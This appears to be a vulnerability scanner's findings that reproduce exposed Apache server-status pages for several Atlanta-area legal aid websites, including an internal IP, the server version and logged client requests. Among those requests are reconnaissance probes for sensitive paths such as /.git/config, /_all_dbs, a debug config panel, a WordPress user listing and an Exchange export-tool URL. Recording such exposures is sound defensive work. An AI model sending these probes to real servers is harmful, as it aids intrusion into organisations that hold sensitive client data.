70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 7-114154149/35/111260K 3.820012.80.931639.97 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 8-114170628/11/101397K 0.07009.90.021641.50 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-114-0/0/96220. 0.03400.00.001306.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-114170680/8/89191_ 0.1514560.00.021374.22 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 11-114170731/7/75409K 0.17301.10.101157.83 130.176.137.97http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 12-114170740/7/76500_ 0.1611700.00.021067.53 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 13-1141707510/11/57844K 0.040017.80.02766.73 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-114-0/0/46599. 36.01300.00.00625.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-114170768/10/46168K 0.120137.30.04667.17 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 16-114170770/7/37696_ 0.151200.00.09551.06 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /.git/config HTTP/1.1 17-114167740/12/23578_ 0.4613570.00.43301.77 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /_all_dbs HTTP/1.1 18-114-0/0/17620. 0.002000.00.00232.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-114-0/0/16218. 0.25200.00.00263.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-114-0/0/17585. 0.001900.00.00229.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-114167900/13/15149_ 0.4411750.00.32241.30 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 22-114-0/0/15521. 0.52100.00.00203.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-114167920/14/14055_ 0.4210660.00.28221.34 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 24-114167930/10/11436_ 0.4712600.00.50136.75 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 25-114171080/1/6263_ 0.0314830.00.00117.83 70.132.4.95http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 26-114-0/0/6542. 0.001800.00.00126.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-114-0/0/5109. 0.42500.00.0088.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-114-0/0/5598. 0.001400.00.0076.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-114-0/0/5127. 0.001700.00.0080.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-114-0/0/4869. 0.001600.00.0069.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-114-0/0/5219. 0.001500.00.0066.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-114-0/0/5555. 0.001300.00.0087.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-114-0/0/5594. 0.001200.00.0090.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-114-0/0/5579. 0.001100.00.0065.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-114168446/18/4641K 0.47007.70.4455.38 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 36-114-0/0/4724. 0.001000.00.0081.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-114-0/0/5887. 0.00900.00.0062.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-114-0/0/3844. 0.00800.00.0047.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-114-0/0/5056. 0.00700.00.0069.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-114-0/0/4682. 0.00600.00.0042.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-113-0/0/1926. 30.752097900.00.0023.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-113-0/0/2631. 2.302622700.00.0025.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-113-0/0/1354. 0.013817800.00.0013.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-113-0/0/887. 0.003817700.00.009.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-113-0/0/1956. 0.013817900.00.0020.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-113-0/0/1010. 0.003817600.00.0010.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-113-0/0/938. 0.713705000.00.0015.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-113-0/0/1181. 0.003818000.00.0021.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-113-0/0/1211. 0.903705100.00.0011.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-113-0/0/940. 0.003816900.00.0021.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-113-0/0/852. 0.003816700.00.0011.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-113-0/0/995. 0.003816500.00.0015.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-113-0/0/837. 0.003816600.00.0014.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-113-0/0/894. 0.003816800.00.0018.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-113-0/0/991. 0.0038164
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed683f495c
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 14-Jun-2023 12:07:22 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 53 days 20 hours 23 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 683735 - Total Traffic: 11.9 GB CPU Usage: u179.3 s23.17 cu0 cs0 - .00435% CPU load .147 requests/sec - 2736 B/second - 18.2 kB/request 11 requests currently being processed, 6 idle workers _KKWKK__KK_KK__KK............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5426590/34/46285_ 2.37000.00.29842.42 130.176.162.73http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-5411869/613/47784K 18.060011.66.45911.89 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5444972/2/46267K 0.00102.10.00821.36 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-5444405/9/43084W 0.07006.60.11757.52 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 4-548241/688/44087K 21.00401.610.20711.05 70.132.4.95http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-5445023/3/42774K 0.00203.10.00734.71 130.176.137.155http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 6-5445030/0/39632_ 0.00400.00.00755.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-5445120/0/39738_ 0.00300.00.00751.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-548355/584/35394K 20.570010.06.77728.33 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-5443648/21/33653K 1.100048.90.24596.43 130.176.137.155http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 10-5445130/0/33433_ 0.00300.00.00604.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-5443709/19/26464K 0.140115.90.06474.25 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 12-5443889/20/24621K 1.040013.50.14458.09 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-5445180/0/21498_ 0.00300.00.00346.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5445230/0/17702_ 0.00300.00.00280.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5444036/16/16490K 0.90007.90.12333.74 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 16-54447410/12/14506K 0.040117.00.03217.41 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 17-53-0/0/9678. 0.002467300.00.00127.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-53-0/0/8638. 0.002467200.00.00103.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-53-0/0/6575. 0.002467100.00.00121.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-53-0/0/6778. 0.002467000.00.00100.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-53-0/0/5242. 0.002466900.00.00102.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-53-0/0/6968. 0.002466700.00.0095.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-53-0/0/5115. 0.002466800.00.00105.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-53-0/0/5190. 0.003540000.00.0058.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2585. 2.392934000.00.0053.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53-0/0/2918. 0.063502300.00.0072.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-53-0/0/2335. 0.273502200.00.0051.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-53-0/0/2238. 0.003542400.00.0041.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-53-0/0/2170. 2.373044100.00.0049.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53-0/0/2043. 4.302466400.00.0032.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-53-0/0/1904. 0.583411600.00.0029.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-53-0/0/1827. 0.003542300.00.0050.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-53-0/0/2905. 0.003542200.00.0055.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-53-0/0/1957. 0.003542000.00.0026.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-53-0/0/1427. 0.003542100.00.0023.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-53-0/0/1631. 0.903411700.00.0039.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-53-0/0/2063. 0.553380500.00.0025.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-53-0/0/1396. 0.003541900.00.0021.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-53-0/0/1467. 0.003541800.00.0023.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-53-0/0/1383. 0.003541700.00.0018.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-53-0/0/555. 0.004402700.00.0011.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-53-0/0/543. 0.064401900.00.009.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-53-0/0/748. 0.164395900.00.009.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-53-0/0/658. 0.064401200.00.006.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-53-0/0/870. 0.064400900.00.0014.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-53-0/0/548. 0.014400200.00.007.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-53-0/0/500. 0.054400600.00.006.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-53-0/0/567. 2.124358900.00.007.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-53-0/0/377. 0.004402300.00.004.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-53-0/0/647. 0.674401500.00.009.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-53-0/0/510. 0.524397400.00.007.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-53-0/0/483. 0.064401400.00.006.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-53-0/0/401. 0.534400400.00.009.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-53-0/0/521. 0.004402200.00.008.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-53-0/0/459. 0.104397300.00.004.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-53-0/0/707. 11.543940500.00.0013.23 ::1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed71172be7
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 14-Jun-2023 12:07:22 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 53 days 20 hours 23 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 683733 - Total Traffic: 11.9 GB CPU Usage: u179.3 s23.17 cu0 cs0 - .00435% CPU load .147 requests/sec - 2736 B/second - 18.2 kB/request 12 requests currently being processed, 5 idle workers KKKKKK__KK_KK__KW............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5426591/34/46285K 2.37401.70.29842.42 130.176.162.73http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-5411869/613/47784K 18.060011.66.45911.89 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5444972/2/46267K 0.00102.10.00821.36 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-5444405/9/43084K 0.07006.60.11757.52 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 4-548241/688/44087K 21.00401.610.20711.05 70.132.4.95http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-5445023/3/42774K 0.00203.10.00734.71 130.176.137.155http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 6-5445030/0/39632_ 0.00300.00.00755.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-5445120/0/39738_ 0.00200.00.00751.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-548355/584/35394K 20.570010.06.77728.33 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-5443647/20/33652K 1.100047.80.24596.43 130.176.137.155http/1.1legalaidconnections.org:8080GET /_all_dbs HTTP/1.1 10-5445130/0/33433_ 0.00200.00.00604.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-5443709/19/26464K 0.140115.90.06474.25 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 12-5443889/20/24621K 1.040013.50.14458.09 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-5445180/0/21498_ 0.00200.00.00346.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5445230/0/17702_ 0.00200.00.00280.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5444036/16/16490K 0.90007.90.12333.74 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 16-5444749/11/14505W 0.040011.90.02217.40 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 17-53-0/0/9678. 0.002467200.00.00127.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-53-0/0/8638. 0.002467100.00.00103.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-53-0/0/6575. 0.002467000.00.00121.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-53-0/0/6778. 0.002466900.00.00100.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-53-0/0/5242. 0.002466800.00.00102.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-53-0/0/6968. 0.002466600.00.0095.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-53-0/0/5115. 0.002466700.00.00105.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-53-0/0/5190. 0.003540000.00.0058.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2585. 2.392933900.00.0053.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53-0/0/2918. 0.063502200.00.0072.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-53-0/0/2335. 0.273502100.00.0051.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-53-0/0/2238. 0.003542400.00.0041.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-53-0/0/2170. 2.373044100.00.0049.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53-0/0/2043. 4.302466300.00.0032.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-53-0/0/1904. 0.583411500.00.0029.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-53-0/0/1827. 0.003542300.00.0050.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-53-0/0/2905. 0.003542200.00.0055.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-53-0/0/1957. 0.003542000.00.0026.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-53-0/0/1427. 0.003542100.00.0023.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-53-0/0/1631. 0.903411600.00.0039.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-53-0/0/2063. 0.553380500.00.0025.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-53-0/0/1396. 0.003541900.00.0021.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-53-0/0/1467. 0.003541800.00.0023.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-53-0/0/1383. 0.003541700.00.0018.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-53-0/0/555. 0.004402700.00.0011.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-53-0/0/543. 0.064401900.00.009.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-53-0/0/748. 0.164395900.00.009.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-53-0/0/658. 0.064401200.00.006.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-53-0/0/870. 0.064400900.00.0014.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-53-0/0/548. 0.014400200.00.007.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-53-0/0/500. 0.054400600.00.006.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-53-0/0/567. 2.124358800.00.007.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-53-0/0/377. 0.004402300.00.004.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-53-0/0/647. 0.674401500.00.009.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-53-0/0/510. 0.524397400.00.007.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-53-0/0/483. 0.064401400.00.006.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-53-0/0/401. 0.534400400.00.009.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-53-0/0/521. 0.004402200.00.008.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-53-0/0/459. 0.104397300.00.004.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-53-0/0/707. 11.543940500.00.0013.23 ::1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edb86f84f6
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 14-Jun-2023 12:07:22 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 55 Parent Server MPM Generation: 54 Server uptime: 53 days 20 hours 23 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 683732 - Total Traffic: 11.9 GB CPU Usage: u179.3 s23.17 cu0 cs0 - .00435% CPU load .147 requests/sec - 2736 B/second - 18.2 kB/request 12 requests currently being processed, 5 idle workers KKKKKK__KK_WK__KK............................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5426591/34/46285K 2.37401.70.29842.42 130.176.162.73http/1.1legalaidconnections.org:8080GET / HTTP/1.1 1-5411869/613/47784K 18.060011.66.45911.89 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-5444972/2/46267K 0.00102.10.00821.36 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-5444405/9/43084K 0.07006.60.11757.52 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 4-548241/688/44087K 21.00401.610.20711.05 70.132.4.95http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-5445023/3/42774K 0.00203.10.00734.71 130.176.137.155http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 6-5445030/0/39632_ 0.00300.00.00755.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-5445120/0/39738_ 0.00200.00.00751.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-548355/584/35394K 20.570010.06.77728.33 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-5443647/20/33652K 1.100047.80.24596.43 130.176.137.155http/1.1legalaidconnections.org:8080GET /_all_dbs HTTP/1.1 10-5445130/0/33433_ 0.00200.00.00604.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-5443708/18/26463W 0.140010.80.06474.24 70.132.4.67http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 12-5443889/20/24621K 1.040013.50.14458.09 70.132.4.67http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-5445180/0/21498_ 0.00200.00.00346.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5445230/0/17702_ 0.00200.00.00280.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5444036/16/16490K 0.90007.90.12333.74 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 16-5444749/11/14505K 0.040011.90.02217.40 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 17-53-0/0/9678. 0.002467200.00.00127.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-53-0/0/8638. 0.002467100.00.00103.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-53-0/0/6575. 0.002467000.00.00121.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-53-0/0/6778. 0.002466900.00.00100.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-53-0/0/5242. 0.002466800.00.00102.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-53-0/0/6968. 0.002466600.00.0095.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-53-0/0/5115. 0.002466700.00.00105.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-53-0/0/5190. 0.003540000.00.0058.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2585. 2.392933900.00.0053.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53-0/0/2918. 0.063502200.00.0072.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-53-0/0/2335. 0.273502100.00.0051.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-53-0/0/2238. 0.003542400.00.0041.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-53-0/0/2170. 2.373044100.00.0049.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53-0/0/2043. 4.302466300.00.0032.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-53-0/0/1904. 0.583411500.00.0029.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-53-0/0/1827. 0.003542300.00.0050.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-53-0/0/2905. 0.003542200.00.0055.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-53-0/0/1957. 0.003542000.00.0026.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-53-0/0/1427. 0.003542100.00.0023.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-53-0/0/1631. 0.903411600.00.0039.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-53-0/0/2063. 0.553380500.00.0025.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-53-0/0/1396. 0.003541900.00.0021.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-53-0/0/1467. 0.003541800.00.0023.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-53-0/0/1383. 0.003541700.00.0018.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-53-0/0/555. 0.004402700.00.0011.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-53-0/0/543. 0.064401900.00.009.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-53-0/0/748. 0.164395900.00.009.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-53-0/0/658. 0.064401200.00.006.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-53-0/0/870. 0.064400900.00.0014.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-53-0/0/548. 0.014400200.00.007.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-53-0/0/500. 0.054400600.00.006.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * 